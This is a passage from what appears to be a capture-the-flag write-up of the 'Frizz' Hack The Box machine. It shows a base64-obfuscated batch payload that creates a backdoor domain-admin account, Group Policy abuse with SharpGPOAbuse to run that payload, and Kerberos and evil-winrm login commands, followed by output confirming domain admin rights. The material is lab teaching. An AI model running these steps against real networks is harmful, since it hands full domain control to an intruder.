[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("QGVjaG8gb2ZmCnNldCAidXNlcm5hbWU9bGV0bWVpbiIKc2V0ICJwYXNzd29yZD1QYXNzd29yZDEyMyQiCm5ldCB1c2VyICV1c2VybmFtZSUgJXBhc3N3b3JkJSAvYWRkIC9kb21haW4KbmV0IGdyb3VwICJEb21haW4gQWRtaW5zIiAldXNlcm5hbWUlIC9hZGQgL2RvbWFpbgpuZXQgZ3JvdXAgIkVudGVycHJpc2UgQWRtaW5zIiAldXNlcm5hbWUlIC9hZGQgL2RvbWFpbgpuZXQgbG9jYWxncm91cCBBZG1pbmlzdHJhdG9ycyAldXNlcm5hbWUlIC9hZGQKbmV0IGxvY2FsZ3JvdXAgIlJlbW90ZSBNYW5hZ2VtZW50IFVzZXJzIiAldXNlcm5hbWUlIC9hZGQ=")) | Out-File create_user.bat -Encoding "ASCII"Note: For some god damn reason
Out-File(or>redirection) use Unicode encoding by default... To avoid extra bytes useASCIIencoding.
Run the script
Remove-GPO Nothing2See
New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"
\Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddComputerTask --TaskName "Letmein" --Author FRIZZ.HTB\m.schoolbus --Command "cmd.exe" --Arguments "/c \Users\M.SchoolBus\Music\create_user.bat" --GPOName "Nothing2See" --Force
gpupdate /force
net user letmein
Remove-GPO Nothing2See; New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"; \Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddComputerTask --TaskName "Letmein" --Author FRIZZ.HTB\m.schoolbus --Command "cmd.exe" --Arguments "/c \Users\M.SchoolBus\Music\create_user.bat" --GPOName "Nothing2See" --Force; gpupdate /force; net user letmeinLogin
└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'letmein':'Password123$' -k
└─$ export KRB5CCNAME=$(readlink -f ./letmein.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
*Evil-WinRM* PS C:\Users\letmein3\Documents> whoami /all
User Name SID
============== ===============================================
frizz\letmein3 S-1-5-21-2386970044-1145388522-2932701813-11108
Group Name Type SID Attributes
============================================ ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
frizz\Domain Admins Group S-1-5-21-2386970044-1145388522-2932701813-512 Mandatory group, Enabled by default, Enabled group
frizz\Enterprise Admins Group S-1-5-21-2386970044-1145388522-2932701813-519 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias S-1-5-21-2386970044-1145388522-2932701813-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session EnabledLast updated